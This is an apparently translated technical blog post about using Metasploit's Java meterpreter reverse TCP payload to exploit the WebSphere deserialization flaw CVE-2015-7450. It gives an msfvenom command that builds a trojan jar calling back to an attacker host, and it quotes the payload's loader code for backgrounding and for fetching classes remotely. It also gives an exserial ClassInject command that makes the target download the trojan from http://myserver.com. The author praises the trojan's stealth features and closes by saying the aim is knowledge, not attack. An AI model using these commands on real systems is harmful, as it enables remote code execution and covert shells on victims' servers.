Research on JAVA reverse TCP practices in Metasploit

Research on JAVA reverse TCP practices in Metasploit

 

When studying the JAVA deserialization vulnerability of CVE-2015-7450, there is a problem: in WebSphere, this vulnerability can only execute commands, but not echo the execution results.

In this case, the common practice is to use commands such as wget or curl to execute an http request and send the required information. But in our company, these commands cannot be used. The reason is that our company uses the AIX operating system in large quantities and does not include "Bare version" with any function enhancements ". How to display execution results in such an environment becomes very important.

A vulnerability exploitation project was found during Google search. In the detailed introduction of this project, we mentioned a method of using metasploit for shell rebound. After studying this practice, I deeply admire its clever design. I would like to introduce it to you.

1. What is metasploit?

Metasploit is a set of open-source Vulnerability exploitation tools and frameworks. Because it is a framework, everyone can submit vulnerability exploitation modules written using this framework. Over time, the module library grew larger and larger, and finally formed a set of tool libraries. The installation of metasploit in various systems is not described here.

2. What is the use of JAVA reverse TCP in metasploit?

Generally, one vulnerability may encounter two annoying problems:

As described in the preface, we can execute a command, but we cannot perceive the result of command execution, so it becomes a vulnerability that can only be exploited but cannot be exploited, we can implant Trojans through vulnerabilities, but because of the firewall, we cannot actively contact the trojan, because the firewall rules generally prohibit inbound traffic, but do not prevent outbound traffic.

In this case, a reverse TCP connection is required. The so-called reverse TCP means that a trojan actively connects to the server and forms a channel. Then, the trojan uses this channel to execute commands and observe the output.

3. How to Establish a JAVA reverse TCP connection in metasploit

First, we use the following command to generate a "Trojan"

msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -t jar > java_meterpreter_reverse_tcp.jar

WhereLHOSTIs the IP address of the server for Trojan callback,LPORTIs the port of the server for Trojan callback.

Then we use metasploit to establish the server. If the trojan is executed, a connection will be established.

If the trojan is executed, a connection is established.

 

Finally, you can connect to the Trojan to execute the command.

 

4. Technical insider of JAVA reverse TCP in metasploit

First, I must express my sincere admiration for the trojan authors. I have worked on normal projects for nearly 10 years and never considered some technical details. They have all considered them, for example, background running, encryption code, volume reduction, dynamic update, and trace cleaning, there are many things worth learning.

In this example, the first thing worth learning is how JAVA runs in the background. When we use commandsjava -jar java_meterpreter_reverse_tcp.jarWhen running a Trojan, I habitually wait and observe the output. However, the process exits directly. This is a pure JAVA program and does not run through SHELL. How does it run in the background ??

By analyzing the source code, we can see that:

Process proc = Runtime.getRuntime().exec(new String[]{                      getJreExecutable("java"),                    "-classpath",                    tempDir.getAbsolutePath(),                    clazz.getName()            });            // the input streams might cause the child process to block if            // we do not read or close them            proc.getInputStream().close();            proc.getErrorStream().close();            // give the process plenty of time to load the class if needed            Thread.sleep(2000);

It uses the Runtime interface to start another process to execute the code later, and reserves enough time to wait for the initialization of the second process, and then let itself exit. What a clever practice.

The newly started process will obtain the classes and resources required during the runtime from the remote metasploit server to reduce its volume. Bravo, Again.

if (url.startsWith("raw:"))                      // for debugging: just use raw bytes from property file                    in = new ByteArrayInputStream(url.substring(4).getBytes("ISO-8859-1"));                else if (url.startsWith("https:")) {                    URLConnection uc = new URL(url).openConnection();                    // load the trust manager via reflection, to avoid loading                    // it when it is not needed (it requires Sun Java 1.4+)                    Class.forName("metasploit.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});                    in = uc.getInputStream();                } else                    in = new URL(url).openStream();                out = new ByteArrayOutputStream();

Finally, connect to metasploit and execute related commands through the loaded class.

5. Application in deserialization

Basically, this vulnerability is exploited to upload our Trojan Horse to WebSphere and start the "fermentation" process. Note that the trojan jar package parameter in this command is a url address,

java -jar exserial.jar ClassInject "http://myserver.com/java_meterpreter_reverse_tcp.jar" "metasploit.Payload" > demo3.ser

Why? It is very difficult to use the JAVA deserialization vulnerability to directly upload files. Therefore, we need to put the "Trojan" on a server for WebSphere to fetch. Of course, Apache can be used to achieve the goal. Through this series of operations, you can reverse execute the command.

The purpose of this article is not to teach you how to attack. Instead, we will analyze the practices behind the tools to increase our knowledge.